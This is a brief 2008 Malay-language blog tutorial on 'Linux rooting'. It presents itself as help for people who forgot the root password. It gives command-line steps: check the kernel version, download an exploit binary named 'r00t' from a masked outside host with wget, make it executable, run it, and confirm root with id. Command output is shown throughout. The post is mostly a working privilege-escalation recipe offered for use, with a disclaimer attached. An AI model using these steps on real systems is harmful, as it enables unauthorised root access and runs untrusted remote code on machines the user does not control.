LINUX ROOTING..
February 19th, 2008
Bagi sesiapa yang lupa password utk root.. di sini sy bg satu tutorial macam macam nak jadikan user biasa supaya ada access SU (uid=0 and gid=0)..
1) uname -a
Linux xxx.xxx.xxx 2.6.9-22.ELsmp #1 SMP Mon Feb 18 20:32:14 EDT 2008 i686 i686 i386 GNU/Linux
uid=500(user) gid=500(user) groups=500(user)
>> kernel 2.6.x.
>> main target, jadikan “user” dari gid “user” menjadi gid=0
2) wget xxx.xx/r00t
–23:53:20– http://xxx.xx/r00t
=> `r00t’
Resolving xxx.xx… xxx.xx.xx.xx
Connecting to xxx.xx|xxx.xx.xx.xx|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 8,071 (7.9K) [text/plain]
0K ……. 100% 120.94 KB/s
>> download r00t tool..
3) chmod 777 r00t
>> To read, write, and execute file
4) ./r00t
>> execute file
5) id
uid=0(root) gid=0(root) groups=48(user)
>> check whether it working or not..
DISCLAIMER: I will not be responsible for the misuse of this article. Use at your own risk..


Please leave a Comment